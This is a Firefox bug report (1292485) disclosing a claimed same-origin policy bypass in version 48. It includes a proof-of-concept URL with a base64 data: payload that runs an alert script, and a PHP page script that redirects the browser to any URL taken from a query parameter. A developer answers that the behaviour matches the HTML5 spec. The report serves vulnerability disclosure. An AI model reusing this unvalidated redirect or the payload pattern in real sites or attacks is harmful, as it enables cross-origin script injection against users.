1292485 - Firefox V48.0 Same Origin Policy Bypass

Status: RESOLVED DUPLICATE of bug 255107

(Firefox :: Untriaged, defect)

Description

[Yuyang Zhou]

Attachment: PoC.png

User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36

Steps to reproduce:

Version:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

PoC:
http://2.srcms.applinzi.com/uxss.php?ff=data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg==

uxss.php:

<script>

	function getParameter(name){
        var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r);
            return (!m ? "" : m[2]);
}

        if(typeof(pgvMain) == "function") {
            pgvMain();
        }
        
        var durl = getParameter("ff");
        setTimeout(function(){
                window.location.replace(durl);
            }, 2);

    </script>


Actual results:

When the browser executes the 'window.location.replace(durl);' command, the data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg== should belong to the data URL origin, but in this case, the 'data:text/html' could read the 'http://2.srcms.applinzi.com' origin's 'location.href'. So this is a typical Same Origin Police Bypass problem 


Expected results:

data URL could never read the content of the refer pages.

Comment 1

[Daniel Veditz [:dveditz]]

This is actually how navigating to a data: URL is spec'd in HTML5, though most browsers don't do this. We're considering changing the behavior.